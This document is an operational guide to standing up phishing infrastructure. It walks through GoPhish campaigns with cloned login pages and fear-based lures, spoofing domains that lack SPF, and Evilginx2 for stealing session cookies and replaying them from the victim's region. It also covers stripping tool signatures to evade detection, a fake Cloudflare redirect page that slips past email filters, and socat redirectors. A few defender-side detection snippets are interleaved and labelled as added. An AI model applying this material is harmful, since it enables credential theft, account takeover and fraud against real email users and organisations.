Phishing Infrastructure


Configuration Overview

Domain Name


After you buy a domain, point its name server records at DigitalOcean.

Buying Expired Domains

  • expireddomains.net

  • Domainhunter [Github]

    • Finding a domain based on keyword

    • Checks categorization against Bluecoat and IBM X-Force.

    • Checks the IP history of the domain.

Adding Content to Domain [Wayback machine]

To fetch this URL without the Wayback Machine toolbar: https://web.archive.org/web/20121107182523/http://www.treeserviceorlando.net

Add “id_” before the referenced url: https://web.archive.org/web/20121107182523id_/http://www.treeserviceorlando.net

Please note: the Wayback Machine does not download JPGs or stylesheets when you add “id_” to the URL. Simply wget the regular version (with the toolbar, JPGs and stylesheets) first, then wget the “id_” version afterwards. The second fetch overwrites the HTML files with versions that do not include the toolbar and leaves the rest in place.

Free/Paid HTML Templates

  • Use single-page HTML templates.

  • Additional resources can be hosted on an S3 bucket.

Domain Categorization

During OSINT, identify which internal proxy/firewall technology the target is using, since that decides whose categorization of the domain matters.

GoPhish

  • Send Phish

  • Track interaction

  • Landing-page Hosting

Setup

  • Install Kali. Refer to this guide.

    • Firewall Rule sets:

      • ufw allow proto tcp from any to any port 80,443 [Landing page]

      • ufw allow 22

      • ufw allow 8080 [Gophish Admin page]

    • Set up tmux: refer to this guide.

  • Set up a certificate using Let's Encrypt.

snap install core
snap refresh core
snap install --classic certbot
sudo certbot --nginx
# Enter the domains when prompted, separated by a space:
domain.com <space> www.domain.com

wget <gophish URL.zip>
apt install unzip
unzip gophish.zip
chmod +x gophish

# Copy the Let's Encrypt certificates into the GoPhish directory
cp /etc/letsencrypt/live/[DOMAIN]/privkey.pem [DOMAIN].key
cp /etc/letsencrypt/live/[DOMAIN]/fullchain.pem [DOMAIN].crt
# Update config.json with your favorite editor:
#   admin_server.listen_url -> 0.0.0.0:port_number
#   phish_server cert_path/key_path -> [DOMAIN].crt and [DOMAIN].key
./gophish

  • Set up the Sending Profile. Test with temporary mailboxes. If the target does not have SPF records, you can send using their domain to improve the trust factor.

  • Set up the landing page using the 'Import URL' feature.

  • Set up the Email Template.

    • Use stripo to create beautiful HTML emails.

    • After copying to email template, replace the URL with {{.URL}}

    • Be creative with the pretense. Use the element of fear. Eg: Job cutbacks.

  • Clone a website using landing page feature on GoPhish.

  • Launch campaign
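A defender-side check for the SPF point above, added here as an example and not part of the original notes: it evaluates constructed TXT records instead of doing live DNS lookups, and treats a domain as spoofable whenever DMARC is not enforced, because SPF alone only covers the envelope sender and not the visible From: address.

```python
import re

# Constructed TXT records keyed by query name (sample data, not live DNS answers).
SAMPLE_TXT = {
    "example.com": ["v=spf1 include:_spf.google.com -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"],
    "weak.example": ["v=spf1 +all"],
    "monitor.example": ["v=spf1 ip4:192.0.2.10 ~all"],
    "_dmarc.monitor.example": ["v=DMARC1; p=none"],
    "none.example": [],
}

def spf_record(txt_records):
    """The single SPF record among the TXT strings; None if absent or duplicated."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    return spf[0] if len(spf) == 1 else None

def spf_all_qualifier(spf):
    """Qualifier on the terminating 'all' mechanism: '-', '~', '?' or '+' (None if no 'all')."""
    m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", spf)
    return (m.group(1) or "+") if m else None

def dmarc_policy(txt_records):
    """DMARC 'p=' tag value, or None when no DMARC record is published."""
    for r in txt_records:
        if r.lower().startswith("v=dmarc1"):
            m = re.search(r"\bp=(none|quarantine|reject)", r, re.I)
            return m.group(1).lower() if m else "none"
    return None

def assess_spoofability(domain, txt=SAMPLE_TXT):
    """Summarise how well the domain owner has locked down use of the name in From:."""
    spf = spf_record(txt.get(domain, []))
    qual = spf_all_qualifier(spf) if spf else None
    policy = dmarc_policy(txt.get("_dmarc." + domain, []))
    if qual == "-":
        spf_verdict = "hardfail SPF"
    elif qual == "~":
        spf_verdict = "softfail SPF"
    else:  # no record, no 'all', '?all' or '+all' all let forged mail through
        spf_verdict = "no effective SPF"
    if policy in ("quarantine", "reject"):
        dmarc_verdict = "DMARC enforced"
    elif policy == "none":
        dmarc_verdict = "DMARC monitor-only"
    else:
        dmarc_verdict = "no DMARC"
    # SPF is checked against the envelope sender; only an enforced DMARC policy
    # ties the result to the visible From: header, so that is what decides here.
    return {"spf": spf_verdict, "dmarc": dmarc_verdict,
            "spoofable": dmarc_verdict != "DMARC enforced"}
```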

IOCs

  • Remove the X-Mailer header value "gophish" [Sending Profile settings]

  • Change Default RID parameter to anything else to avoid signatures. Eg: http://<URL>?rid=123

#https://github.com/gophish/gophish/blob/master/models/campaign.go#L123
#Change this
const RecipientParameter = "rid"
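The two indicators listed above, turned into a mail-gateway check. This is an added example, not code from the original notes or from GoPhish: it parses a constructed raw message and reports the default X-Mailer header and any link carrying the default rid query parameter.

```python
import re
from email import message_from_string
from urllib.parse import urlsplit, parse_qs

# Constructed sample message carrying both default tells (not a real capture).
SAMPLE_EMAIL = """\
From: HR Team <hr@example-mail.test>
To: alice@example.com
Subject: Job cutbacks - action required
X-Mailer: gophish
Content-Type: text/plain; charset=utf-8

Please review the notice at http://login.example-mail.test/?rid=ABC1234 before Friday.
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")

def _text_parts(msg):
    """Yield decoded text bodies of a parsed message (multipart-aware)."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    for part in parts:
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)
        if payload is not None:
            yield payload.decode(part.get_content_charset() or "utf-8", "replace")

def gophish_indicators(raw):
    """List the default-configuration GoPhish indicators present in a raw message."""
    msg = message_from_string(raw)
    hits = []
    if msg.get("X-Mailer", "").strip().lower() == "gophish":
        hits.append("X-Mailer: gophish")
    for text in _text_parts(msg):
        for url in URL_RE.findall(text):
            url = url.rstrip(".,;)")
            if "rid" in parse_qs(urlsplit(url).query):
                hits.append("rid parameter in " + url)
    return hits
```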

Nginx

  • HTTP Proxy/Router

  • Block all scanning

  • Host multiple websites

  • Let's Encrypt/SSL

Evilginx2

apt-get update
apt-get install nginx certbot python3-certbot-nginx git golang-go unzip net-tools
apt install git make

sudo service nginx restart
nginx -t && nginx -s reload

#Set up SSL certs with LetsEncrypt
sudo certbot --nginx -d <example.com> -d <www.example.com>

#Append to /etc/resolv.conf
nameserver 8.8.8.8

#Disable any other DNS services
sudo systemctl stop systemd-resolved


cd /opt
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
#Install globally
make install

evilginx

config domain <Domain name>
config ip <IP>

IOCs

  • Remove the Signature Evilginx Headers from http_proxy.go

#https://github.com/kgretzky/evilginx2/blob/master/core/http_proxy.go
#Grep for ' := []byte '

hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}

Inject Stolen Cookies

  • Cookie Editor extension [Mozilla extension] -> import the stolen cookies

  • Change the source IP to one matching the victim's location to avoid suspicious logs.

SMTP Servers

  • Use valid mail server providers to gain reputation.

Deploy SMTP Server in VPS

  • Postfix-Server-Setup: remove sensitive information from email headers.

Rate Emails

  • Mail-tester.com

Powershell: Send-MailMessage

Send-MailMessage -To "<recipient's email address>" -From "<sender's email address>" -Subject "Your message subject" -Body "Some important plain text!" -Attachments .\data.csv -SmtpServer "<smtp server>" -Port 25

SendGrid

  • Use a valid domain to create free email IDs & send mails to targets

Mailgun

curl -s --user 'api:<API-KEY-HERE>' \
    https://api.eu.mailgun.net/v3/<YOUR-DOMAIN-HERE>/messages \
    -F from='First Last name <noreply@YOUR-DOMAIN-HERE>' \
    -F to='<RECIPIENT>' \
    -F subject='Hello' \
    -F text='Notification'

Analyze email content for spam score

  • Test Sending Emails with mailtrap.io

  • Use a proxy website URL while sending mails to redirect to landing page. This bypasses Email Filters and prevents scanners from flagging your landing domain as malicious.

<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>Just a moment...</title>
</head>
<body>
<table width="100%" height="100%" cellpadding="30">
<tr>
<td align="center" valign="middle">
<h1>Checking your browser</h1>
<div id="challenge" style="display:none;">
<p>This process is automatic. Your browser will redirect to your requested content shortly.</p>
<p>Please allow up to 5 seconds...</p>
</div>
<div style="margin-top:20px;">
<a href="http://www.cloudflare.com/" target="_blank" style="font-size: 12px;">DDoS protection by CloudFlare</a>
</div>
</td>
</tr>
</table>
<script>setTimeout(function(){
            window.location.href = "<INSERT-YOUR-LANDING-PAGE-HERE>";
         },4000);
      </script>
</body>
</html>
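As an added example that is not part of the original notes, a detection-side check for the interstitial pattern shown above: it pulls the target and delay out of the setTimeout redirect and flags the page when it sends the visitor off-site while imitating a browser check. The sample HTML is constructed, with a made-up landing URL in place of the placeholder.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of the interstitial (placeholder replaced by a made-up URL).
SAMPLE_HTML = """<!DOCTYPE HTML><html><head><title>Just a moment...</title></head><body>
<h1>Checking your browser</h1>
<a href="http://www.cloudflare.com/">DDoS protection by CloudFlare</a>
<script>setTimeout(function(){
    window.location.href = "https://landing.example.test/login";
},4000);</script></body></html>"""

# setTimeout(function(){ ... window.location[.href] = "<url>" ... }, <ms>)
REDIRECT_RE = re.compile(
    r"setTimeout\s*\(\s*function\s*\(\s*\)\s*\{[^}]*?"
    r"window\.location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"'][^}]*\}\s*,\s*(\d+)\s*\)",
    re.S,
)
LOOKALIKE_RE = re.compile(r"checking your browser|ddos protection by cloudflare", re.I)

def timed_js_redirect(html):
    """Return (target_url, delay_ms) for a setTimeout-driven redirect, else None."""
    m = REDIRECT_RE.search(html)
    return (m.group(1), int(m.group(2))) if m else None

def is_suspicious_interstitial(html, served_from_host):
    """Flag a timed off-site redirect dressed up as a browser check."""
    found = timed_js_redirect(html)
    if not found:
        return False
    target, delay = found
    target_host = urlsplit(target).hostname or served_from_host
    cross_site = target_host != served_from_host
    return cross_site and (bool(LOOKALIKE_RE.search(html)) or delay >= 1000)
```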

Redirectors

#DNS Redirector
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<DEST IP>; echo -ne

#HTTP Redirector
socat TCP4-LISTEN:80,bind=<Interface IP>,fork TCP4:<DEST IP>:80

Azure

  • Hide our IP Address

  • IP Filtering [Based on country]

  • Domain Reputation

  • azureedge.net

Automation

Ansible

  • For OS Configuration

Ansible Vault | Secret Management

  • Use it for hard-coded tokens/API keys.

Terraform

  • For everything other than OS Configuration.

Docker

Execution

  • Clone Github Repo

  • Set up API keys [DigitalOcean + Azure]

  • Configure variable files

  • Run playbook
